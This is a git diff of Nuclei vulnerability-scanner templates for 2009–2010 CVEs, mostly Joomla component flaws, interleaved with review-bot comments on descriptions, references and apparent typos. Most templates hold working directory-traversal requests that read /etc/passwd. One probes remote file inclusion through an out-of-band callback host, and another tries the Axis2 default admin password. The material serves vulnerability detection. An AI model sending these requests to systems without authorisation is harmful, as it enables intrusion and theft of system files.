@@ -1,31 +0,0 @@ -id: CVE-2009-2100 - -info: - name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8946 - - https://www.cvedetails.com/cve/CVE-2009-2100 - - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/ - - http://www.securityfocus.com/bid/35378 - classification: - cve-id: CVE-2009-2100 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-3053.yaml b/nuclei-templates/CVE-2009/CVE-2009-3053.yaml deleted file mode 100644 index 9457d3a08b..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-3053.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2009-3053 - -info: - name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. - reference: - - https://www.exploit-db.com/exploits/9564 - - https://www.cvedetails.com/cve/CVE-2009-3053 - - https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/ - - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 - classification: - cve-id: CVE-2009-3053 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-3318.yaml b/nuclei-templates/CVE-2009/CVE-2009-3318.yaml similarity index 100% rename from nuclei-templates/CVE-2009/cve-2009-3318.yaml rename to nuclei-templates/CVE-2009/CVE-2009-3318.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml b/nuclei-templates/CVE-2009/CVE-2009-4202.yaml deleted file mode 100644 index 1dc7847bd9..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-4202.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: CVE-2009-4202 - -info: - name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion - author: daffainfo - severity: high - description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8870 - - http://www.vupen.com/english/advisories/2009/1494 - - https://nvd.nist.gov/vuln/detail/CVE-2009-4202 - - http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/ - classification: - cve-id: CVE-2009-4202 - tags: cve,cve2009,joomla,lfi,photo - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/nuclei-templates/CVE-2009/CVE-2009-4223.yaml b/nuclei-templates/CVE-2009/CVE-2009-4223.yaml new file mode 100644 index 0000000000..0d94841eb8 --- /dev/null +++ b/nuclei-templates/CVE-2009/CVE-2009-4223.yaml 
@@ -0,0 +1,28 @@ +id: CVE-2009-4223 + +info: + name: KR-Web <= 1.1b2 RFI + description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. + reference: + - https://sourceforge.net/projects/krw/ + - https://www.exploit-db.com/exploits/10216 + author: geeknik + severity: high + classification: + cve-id: CVE-2009-4223 + tags: cve,cve2009,krweb,rfi + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/nuclei-templates/CVE-2009/CVE-2009-4679.yaml b/nuclei-templates/CVE-2009/CVE-2009-4679.yaml deleted file mode 100644 index 940a03d194..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-4679.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2009-4679 - -info: - name: Joomla! Portfolio Nexus - Remote File Inclusion - author: daffainfo - severity: high - description: | - Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/33440 - - https://www.cvedetails.com/cve/CVE-2009-4679 - - https://nvd.nist.gov/vuln/detail/CVE-2009-4679 - - http://secunia.com/advisories/37760 - classification: - cve-id: CVE-2009-4679 - tags: cve,cve2009,joomla,lfi,nexus - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 
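Review bot: The `description:` in the new CVE-2009-4223.yaml describes the KR-Web product and never says what the flaw is, so a finding from this template gives the person triaging it no explanation. Going by the template's own name and request, something like `description: KR-Web 1.1b2 and earlier allow remote file inclusion through the DOCUMENT_ROOT parameter of adm/krgourl.php.` would state it; the wording should be checked against the CVE record. The new side also drops the `https://exchange.xforce.ibmcloud.com/vulnerabilities/54395` reference that the lowercase file deleted by this commit carried, and it has no `remediation:` field.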
diff --git a/nuclei-templates/CVE-2009/cve-2009-1496.yaml b/nuclei-templates/CVE-2009/cve-2009-1496.yaml new file mode 100644 index 0000000000..96796ca27b --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-1496.yaml @@ -0,0 +1,30 @@ +id: CVE-2009-1496 + +info: + name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8367 + - https://www.cvedetails.com/cve/CVE-2009-1496 + - http://www.securityfocus.com/bid/34431 + classification: + cve-id: CVE-2009-1496 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-1558.yaml b/nuclei-templates/CVE-2009/cve-2009-1558.yaml new file mode 100644 index 0000000000..c70f6219f8 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-1558.yaml 
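Review bot: The `reference:` list in the new cve-2009-1496.yaml keeps only the bare `http://www.securityfocus.com/bid/34431` link, while the CVE-2009-1496.yaml deleted by this commit also carried `http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/`. SecurityFocus BID pages appear to be no longer served, so the archived copy is likely the only one a reader can still open and is worth keeping. The same swap is made in cve-2009-1558, cve-2009-2100, cve-2009-3053 and cve-2009-4202, and the new cve-2009-4202 additionally loses its `https://nvd.nist.gov/vuln/detail/CVE-2009-4202` entry.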
@@ -0,0 +1,30 @@ +id: CVE-2009-1558 + +info: + name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + reference: + - https://www.exploit-db.com/exploits/32954 + - http://www.securityfocus.com/bid/34713 + - http://www.vupen.com/english/advisories/2009/1173 + - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ + classification: + cve-id: CVE-2009-1558 + tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-2100.yaml b/nuclei-templates/CVE-2009/cve-2009-2100.yaml new file mode 100644 index 0000000000..0b560673c6 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-2100.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2009-2100 + +info: + name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8946 + - https://www.cvedetails.com/cve/CVE-2009-2100 + - http://www.securityfocus.com/bid/35378 + - http://osvdb.org/55176 + classification: + cve-id: CVE-2009-2100 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-3053.yaml b/nuclei-templates/CVE-2009/cve-2009-3053.yaml new file mode 100644 index 0000000000..7377bc684f --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-3053.yaml 
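Review bot: The request path in the new cve-2009-2100.yaml reads `option=com_projectfork§ion=...`, which looks like `&section=` with `&sect` converted to the `§` character. If that character is really in the file and not an artefact of how this page was rendered, the `section` parameter named in the description is never sent and the template can never match, which silently hides affected hosts from a scan. The line should be checked in the raw file and written as `option=com_projectfork&section=...` with the rest of the path unchanged. The added reference `http://osvdb.org/55176` points at a database that has been shut down and may not resolve.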
@@ -0,0 +1,31 @@ +id: CVE-2009-3053 + +info: + name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php. + reference: + - https://www.exploit-db.com/exploits/9564 + - https://www.cvedetails.com/cve/CVE-2009-3053 + - http://www.securityfocus.com/bid/36207 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 + classification: + cve-id: CVE-2009-3053 + tags: cve,cve2009,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-4202.yaml b/nuclei-templates/CVE-2009/cve-2009-4202.yaml new file mode 100644 index 0000000000..95e235cf67 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-4202.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2009-4202 + +info: + name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/8870 + - https://www.cvedetails.com/cve/CVE-2009-4202 + - http://www.vupen.com/english/advisories/2009/1494 + - http://www.securityfocus.com/bid/35201 + classification: + cve-id: CVE-2009-4202 + tags: cve,cve2009,joomla,lfi,photo + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/cve-2009-4223.yaml b/nuclei-templates/CVE-2009/cve-2009-4223.yaml deleted file mode 100644 index f6cfc51ae8..0000000000 --- a/nuclei-templates/CVE-2009/cve-2009-4223.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2009-4223 - -info: - name: KR-Web <= 1.1b2 RFI - author: geeknik - severity: high - description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. - reference: - - https://sourceforge.net/projects/krw/ - - https://www.exploit-db.com/exploits/10216 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/54395 - - http://www.exploit-db.com/exploits/10216 - classification: - cve-id: CVE-2009-4223 - tags: cve,cve2009,krweb,rfi - -requests: - - method: GET - path: - - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: interactsh_protocol - words: - - "http" diff --git a/nuclei-templates/CVE-2009/cve-2009-4679.yaml b/nuclei-templates/CVE-2009/cve-2009-4679.yaml new file mode 100644 index 0000000000..5f63aae9d3 --- /dev/null +++ b/nuclei-templates/CVE-2009/cve-2009-4679.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2009-4679 + +info: + name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/33440 + - https://www.cvedetails.com/cve/CVE-2009-4679 + - http://secunia.com/advisories/37760 + - http://www.osvdb.org/61382 + classification: + cve-id: CVE-2009-4679 + tags: cve,cve2009,joomla,lfi,nexus + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0219.yaml b/nuclei-templates/CVE-2010/CVE-2010-0219.yaml deleted file mode 100644 index 9e44b7dcc9..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0219.yaml +++ /dev/null 
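Review bot: The new cve-2009-4679.yaml names the component `com_if_nexus` in its description but requests `option=com_kif_nexus` in the path, so one of the two is misspelled; if it is the path, the template probes a component name that does not exist and reports nothing. The `name:` also says "Remote File Inclusion" while the description and the `lfi` tag describe inclusion of local files through directory traversal. Both should be reconciled with the CVE record, for example `name: Joomla! Component iF Portfolio Nexus - 'Controller' Local File Inclusion`.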
@@ -1,49 +0,0 @@ -id: CVE-2010-0219 - -info: - name: Apache Axis2 Default Login - author: pikpikcu - severity: high - description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. - tags: cve,cve2010,axis,apache,default-login,axis2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2010-0219 - - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html - classification: - cve-id: CVE-2010-0219 - -requests: - - raw: - - | - POST /axis2-admin/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - loginUsername={{username}}&loginPassword={{password}} - - - | - POST /axis2/axis2-admin/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - userName={{username}}&password={{password}}&submit=+Login+ - - payloads: - username: - - admin - password: - - axis2 - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - words: - - "

Welcome to Axis2 Web Admin Module !!

" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0696.yaml b/nuclei-templates/CVE-2010/CVE-2010-0696.yaml deleted file mode 100644 index 66f1da7c88..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0696.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-0696 - -info: - name: Joomla! Component Jw_allVideos - Arbitrary File Download - author: daffainfo - severity: high - description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/11447 - - https://www.cvedetails.com/cve/CVE-2010-0696 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-0944.yaml b/nuclei-templates/CVE-2010/CVE-2010-0944.yaml deleted file mode 100644 index c3838a761f..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0944.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2010-0944 -info: - name: Joomla! Component com_jcollection - Directory Traversal - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11088 - - https://www.cvedetails.com/cve/CVE-2010-0944 - - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt - - http://www.exploit-db.com/exploits/11088 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-0944 - tags: cve,cve2010,joomla,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0972.yaml b/nuclei-templates/CVE-2010/CVE-2010-0972.yaml deleted file mode 100644 index 59555acafe..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0972.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: CVE-2010-0972 -info: - name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - remediation: Apply all relevant security patches and product upgrades. - reference: - - https://www.exploit-db.com/exploits/11738 - - https://www.cvedetails.com/cve/CVE-2010-0972 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-0972 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0982.yaml b/nuclei-templates/CVE-2010/CVE-2010-0982.yaml deleted file mode 100644 index 62c7d669aa..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0982.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-0982 - -info: - name: Joomla! Component com_cartweberp - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/10942 - - https://www.cvedetails.com/cve/CVE-2010-0982 - - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/ - - http://secunia.com/advisories/37917 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-0982 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0985.yaml b/nuclei-templates/CVE-2010/CVE-2010-0985.yaml deleted file mode 100644 index 27a096d30e..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-0985.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-0985 - -info: - name: Joomla! Component com_abbrev - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/10948 - - https://www.cvedetails.com/cve/CVE-2010-0985 - - http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560 - - http://www.securityfocus.com/bid/37560 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-0985 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1217.yaml b/nuclei-templates/CVE-2010/CVE-2010-1217.yaml deleted file mode 100644 index 641c05d517..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1217.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2010-1217 - -info: - name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. - reference: - - https://www.exploit-db.com/exploits/11814 - - https://www.cvedetails.com/cve/CVE-2010-1217 - - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt - - http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866 - remediation: Apply all relevant security patches and product upgrades. - classification: - cve-id: CVE-2010-1217 - tags: cve,cve2010,joomla,lfi,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/13 diff --git a/nuclei-templates/CVE-2010/cve-2010-1305.yaml b/nuclei-templates/CVE-2010/CVE-2010-1305.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1305.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1305.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1306.yaml b/nuclei-templates/CVE-2010/CVE-2010-1306.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1306.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1306.yaml 
diff --git a/nuclei-templates/CVE-2010/cve-2010-1307.yaml b/nuclei-templates/CVE-2010/CVE-2010-1307.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1307.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1307.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1313.yaml b/nuclei-templates/CVE-2010/CVE-2010-1313.yaml deleted file mode 100644 index 7a1ff39678..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1313.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2010-1313 -info: - name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12082 - - https://www.cvedetails.com/cve/CVE-2010-1313 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1313 -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1469.yaml b/nuclei-templates/CVE-2010/CVE-2010-1469.yaml deleted file mode 100644 index 545b5c6fa6..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1469.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2010-1469 - -info: - name: Joomla! Component JProject Manager 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: | - - https://www.exploit-db.com/exploits/12146 - - https://www.cvedetails.com/cve/CVE-2010-1469 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1469 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml deleted file mode 100644 index 6cbaaf44ea..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2010-1470 - -info: - name: Joomla! Component Web TV 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12166 - - https://www.cvedetails.com/cve/CVE-2010-1470 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1470 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1473.yaml b/nuclei-templates/CVE-2010/CVE-2010-1473.yaml deleted file mode 100644 index 142fe4e823..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1473.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2010-1473 - -info: - name: Joomla! Component Advertising 0.25 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - remediation: Upgrade to a supported version. - reference: - - https://www.exploit-db.com/exploits/12171 - - https://www.cvedetails.com/cve/CVE-2010-1473 - tags: cve,cve2010,joomla,lfi - classification: - cve-id: CVE-2010-1473 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 -# Enhanced by mp on 2022/02/14 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1475.yaml b/nuclei-templates/CVE-2010/CVE-2010-1475.yaml deleted file mode 100644 index c3148da86e..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-1475.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2010-1475 - -info: - name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12147 - - https://www.cvedetails.com/cve/CVE-2010-1475 - classification: - cve-id: CVE-2010-1475 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/24 diff --git a/nuclei-templates/CVE-2010/cve-2010-1476.yaml b/nuclei-templates/CVE-2010/CVE-2010-1476.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1476.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1476.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1491.yaml b/nuclei-templates/CVE-2010/CVE-2010-1491.yaml similarity index 100% rename from nuclei-templates/CVE-2010/cve-2010-1491.yaml rename to nuclei-templates/CVE-2010/CVE-2010-1491.yaml diff --git 